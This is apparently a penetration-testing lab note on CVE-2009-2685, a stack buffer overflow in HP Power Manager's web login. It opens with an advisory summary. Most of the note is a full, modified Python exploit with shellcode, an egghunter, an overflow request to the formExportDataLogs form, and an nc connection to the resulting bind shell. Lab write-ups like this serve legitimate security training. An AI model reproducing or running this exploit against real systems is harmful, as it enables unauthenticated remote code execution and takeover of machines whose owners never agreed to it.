CVE-2009-2685
/Practice/Kevin/3-Exploitation/attachments/{EF1B002B-C844-49E9-A438-71E1F3E57ADA}.png)
A vulnerability has been found in HP Power Manager (the affected version is unknown) and classified as very critical. Affected by this vulnerability is an unknown code of the component Login Form. The manipulation of the argument Login with an unknown input leads to a memory corruption vulnerability. The CWE definition for the vulnerability is CWE-119. The product performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. As an impact it is known to affect confidentiality, integrity, and availability. The summary by CVE is:
Stack-based buffer overflow in the login form in the management web server in HP Power Manager allows remote attackers to execute arbitrary code via the Login variable.
The weakness was shared 11/04/2009 by Janek Vind (Website). It is possible to read the advisory at zerodayinitiative.com. This vulnerability is known as CVE-2009-2685. The exploitation appears to be easy. The attack can be launched remotely. The exploitation doesn’t need any form of authentication. Technical details and also a public exploit are known. The pricing for an exploit might be around USD 5k at the moment (estimation calculated on 12/29/2024).
A public exploit has been developed in Python and been published immediately after the advisory. It is possible to download the exploit at securityfocus.com. It is declared as highly functional. We expect the 0-day to have been worth approximately 100k. The vulnerability scanner Nessus provides a plugin with the ID 44109 (HP Power Manager < 4.2.10), which helps to determine the existence of the flaw in a target environment. It is assigned to the family CGI abuses.
A possible mitigation has been published even before and not after the disclosure of the vulnerability. Furthermore it is possible to detect and prevent this kind of attack with TippingPoint and the filter 8314.
The vulnerability is also documented in the databases at Tenable (44109), SecurityFocus (BID 36933†), OSVDB (59684†), SecurityTracker (ID 1023140†) and Vulnerability Center (SBV-24672†).
Exploit
/Practice/Kevin/3-Exploitation/attachments/{9DE2AA6E-26F3-4A2E-B144-88C8EB1EAB1B}.png)
/Practice/Kevin/3-Exploitation/attachments/{AC6A895E-B9F8-420A-A57A-1EF022429B34}.png)
Exploit found online and it contains a shell code
Modified
#!/usr/bin/python
print """
##//#############################################################################################################
## ## #
## Vulnerability: HP Power Manager 'formExportDataLogs' ## FormExportDataLogs Buffer Overflow #
## ## HP Power Manager #
## Vulnerable Application: HP Power Manager ## This is a part of the Metasploit Module, #
## Tested on Windows [Version 6.1.7600] ## exploit/windows/http/hp_power_manager_filename #
## ## #
## Author: Muhammad Haidari ## Spawns a shell to same window #
## Contact: ghmh@outlook.com ## #
## Website: www.github.com/muhammd ## #
## ## #
##//#############################################################################################################
##
##
## TODO: adjust
##
## Usage: python hpm_exploit.py <Remote IP Address>
"""
import urllib
import os
import sys
import struct
import time
from socket import *
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: %s HOST" % sys.argv[0]
sys.exit()
PORT = 80
#msfvenom -p windows/shell_bind_tcp LHOST=10.11.0.55 LPORT=1234 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
egg="b33fb33f"
buf= egg
buf += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x39\x8c\xb9\x94\x83\xee\xfc\xe2\xf4"
buf += b"\xc5\x64\x3b\x94\x39\x8c\xd9\x1d\xdc\xbd\x79\xf0"
buf += b"\xb2\xdc\x89\x1f\x6b\x80\x32\xc6\x2d\x07\xcb\xbc"
buf += b"\x36\x3b\xf3\xb2\x08\x73\x15\xa8\x58\xf0\xbb\xb8"
buf += b"\x19\x4d\x76\x99\x38\x4b\x5b\x66\x6b\xdb\x32\xc6"
buf += b"\x29\x07\xf3\xa8\xb2\xc0\xa8\xec\xda\xc4\xb8\x45"
buf += b"\x68\x07\xe0\xb4\x38\x5f\x32\xdd\x21\x6f\x83\xdd"
buf += b"\xb2\xb8\x32\x95\xef\xbd\x46\x38\xf8\x43\xb4\x95"
buf += b"\xfe\xb4\x59\xe1\xcf\x8f\xc4\x6c\x02\xf1\x9d\xe1"
buf += b"\xdd\xd4\x32\xcc\x1d\x8d\x6a\xf2\xb2\x80\xf2\x1f"
buf += b"\x61\x90\xb8\x47\xb2\x88\x32\x95\xe9\x05\xfd\xb0"
buf += b"\x1d\xd7\xe2\xf5\x60\xd6\xe8\x6b\xd9\xd3\xe6\xce"
buf += b"\xb2\x9e\x52\x19\x64\xe4\x8a\xa6\x39\x8c\xd1\xe3"
buf += b"\x4a\xbe\xe6\xc0\x51\xc0\xce\xb2\x3e\x73\x6c\x2c"
buf += b"\xa9\x8d\xb9\x94\x10\x48\xed\xc4\x51\xa5\x39\xff"
buf += b"\x39\x73\x6c\xfe\x31\xd5\xe9\x76\xc4\xcc\xe9\xd4"
buf += b"\x69\xe4\x53\x9b\xe6\x6c\x46\x41\xae\xe4\xbb\x94"
buf += b"\x3d\x5e\x30\x72\x53\x9c\xef\xc3\x51\x4e\x62\xa3"
buf += b"\x5e\x73\x6c\xc3\x51\x3b\x50\xac\xc6\x73\x6c\xc3"
buf += b"\x51\xf8\x55\xaf\xd8\x73\x6c\xc3\xae\xe4\xcc\xfa"
buf += b"\x74\xed\x46\x41\x51\xef\xd4\xf0\x39\x05\x5a\xc3"
buf += b"\x6e\xdb\x88\x62\x53\x9e\xe0\xc2\xdb\x71\xdf\x53"
buf += b"\x7d\xa8\x85\x95\x38\x01\xfd\xb0\x29\x4a\xb9\xd0"
buf += b"\x6d\xdc\xef\xc2\x6f\xca\xef\xda\x6f\xda\xea\xc2"
buf += b"\x51\xf5\x75\xab\xbf\x73\x6c\x1d\xd9\xc2\xef\xd2"
buf += b"\xc6\xbc\xd1\x9c\xbe\x91\xd9\x6b\xec\x37\x59\x89"
buf += b"\x13\x86\xd1\x32\xac\x31\x24\x6b\xec\xb0\xbf\xe8"
buf += b"\x33\x0c\x42\x74\x4c\x89\x02\xd3\x2a\xfe\xd6\xfe"
buf += b"\x39\xdf\x46\x41"
#tools/exploit/egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
hunter = ""
hunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += "\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
buffer = "\x41" * (721 -len(hunter))
buffer +="\x90"*30 + hunter
buffer +="\xeb\xc2\x90\x90" #JMP SHORT 0xC2
buffer += "\xd5\x74\x41" #pop esi # pop ebx # ret 10 (DevManBE.exe)
content= "dataFormat=comma&exportto=file&fileName=%s" % urllib.quote_plus(buffer)
content+="&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"
payload = "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % buf
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Payload Fired... She will be back in less than a min..."
s.send(payload)
print "[+] Give me 30 Sec!"
time.sleep(30)
os.system("nc -nv " + HOST +" 1234")
s.close()
print "[+] Did you get your Proof.txt file?!?"
#note if you didn't get a bindshell, you may have to bump it to a minute time.sleep(60).Exploit script has been modified with the payload